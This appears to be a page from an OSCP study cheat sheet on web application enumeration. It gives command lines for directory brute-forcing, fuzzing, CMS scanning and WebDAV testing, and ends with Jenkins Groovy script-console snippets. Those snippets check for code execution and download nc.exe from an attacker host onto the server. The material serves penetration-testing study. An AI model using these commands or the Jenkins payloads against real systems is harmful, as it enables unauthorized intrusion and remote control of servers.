OSCP
Search…
Web Application Directory bruteforcing / fingerprinting

Gobuster

1
gobuster -u http://ip -w /usr/share/wordlists/dirb/small.txt -s 307,200,204,301,302,403 -x txt,sh,cgi,pl -t 50
2
gobuster -u http://ip/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -s 307,200,204,301,302,403 -x txt,sh,cgi,pl -t 50
3
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20
4
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt -t 20
5
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20 -x .txt,.php
6
gobuster -s "200,204,301,302,307,403,500" -w /usr/share/seclists/Discovery/Web_Content/common.txt -u http://
7
gobuster -s "200,204,301,302,307,403,500" -u http://XXXX -w
8
gobuster -u http://ip -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 40
9
Gobuster comprehensive directory busting
10
gobuster -s 200,204,301,302,307,403 -u iop -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
11
Gobuster quick directory busting
12
gobuster -u ip -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux
Copied!

Wfuzz

1
wfuzz -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 400,404,500 http://x.x.x.x/FUZZ
2
wfuzz -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt --hc 400,404,500 http://x.x.x.x/FUZZ
3
wfuzz -c -z range,1-65535 --hl=2 http://ip:60000/url.php?path=1 27.0.0.1:FUZZ
4
wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hh 158607 http://bart.htb/FUZZ
5
Copied!
Nmap HTTP Form Fuzzer
1
nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip
Copied!
Robot.txt audit
1
parsero -u http://X
Copied!
Banner Grabbing
1
nc -v ip port
Copied!
CMSmap
1
cmsmap.py https://x.x.x.x
Copied!

Wordpress Scan WpScan

1
wpscan -u ip/wp/
2
Copied!

Drupal Scan

1
droopescan scan -u $ip
Copied!

Webdav

1
Webdav
2
Test incorrect permissions:
3
4
$ cadaver http://$ip
5
$ davtest http://$ip
6
Copied!
Jenkins Script
1
Jenking groovy code
2
Testing to see if we have code execution…
3
4
def sout = new StringBuffer(), serr = new StringBuffer()
5
def proc = 'powershell.exe $PSVERSIONTABLE'.execute()
6
proc.consumeProcessOutput(sout, serr)
7
proc.waitForOrKill(1000)
8
println "out> $sout err> $serr"
Copied!
Nc Upload in Jenkins Server
1
NC upload in jenkin Server
2
3
def process = "powershell -command Invoke-WebRequest 'http://ip/nc.exe' -OutFile nc.exe".execute();
4
println("${process.text}");
Copied!